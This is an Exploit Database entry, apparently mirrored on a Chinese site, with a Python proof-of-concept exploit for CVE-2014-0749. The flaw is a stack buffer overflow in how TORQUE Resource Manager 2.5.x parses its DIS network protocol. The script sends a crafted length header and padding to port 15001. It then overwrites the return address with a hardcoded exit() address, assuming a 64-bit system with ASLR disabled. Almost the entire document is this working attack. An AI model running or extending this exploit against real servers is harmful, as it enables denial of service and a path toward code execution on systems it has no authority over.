TORQUE Resource Manager 2.5.x < 2.5.13 - Stack Buffer Overflow Stub

• Exploit Database
• 15 阅读

• 作者： bwall
  日期： 2014-05-28
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/33554/

• #!/usr/bin/env python
  # Exploit Title: TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow stub
  # Date: 27 May 2014
  # Exploit Author: bwall - @botnet_hunter
  # Vulnerability discovered by: MWR Labs
  # CVE: CVE-2014-0749
  # Vendor Homepage: http://www.adaptivecomputing.com/
  # Software Link: http://www.adaptivecomputing.com/support/download-center/torque-download/
  # Version: 2.5.13
  # Tested on: Manjaro x64
  # Description:
  # A buffer overflow while parsing the DIS network communication protocol.It is triggered when requesting that
  # a larger amount of data than the small buffer be read.The first digit supplied is the number of digits in the
  # data, the next digits are the actual size of the buffer.
  #
  # This is an exploit stub, meant to be a quick proof of concept.This was built and tested for a 64 bit system
  # with ASLR disabled.Since Adaptive Computing does not supply binary distributions, TORQUE will likely be
  # compiled on the target system.The result of this exploit is intended to just point RIP at 'exit()'
  
  import socket
  
  
  ip = "172.16.246.177"
  port = 15001
  
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((ip, port))
  
  offset = 143
  header = str(len(str(offset))) + str(offset) + '1'
  
  packet = header
  packet += "\x00" * (140 - len(packet))
  packet += ('\xc0\x18\x76\xf7\xff\x7f\x00\x00') # exit() may require a different offset in your build
  
  s.sendall(packet)
  data = s.recv(1024)
  s.close()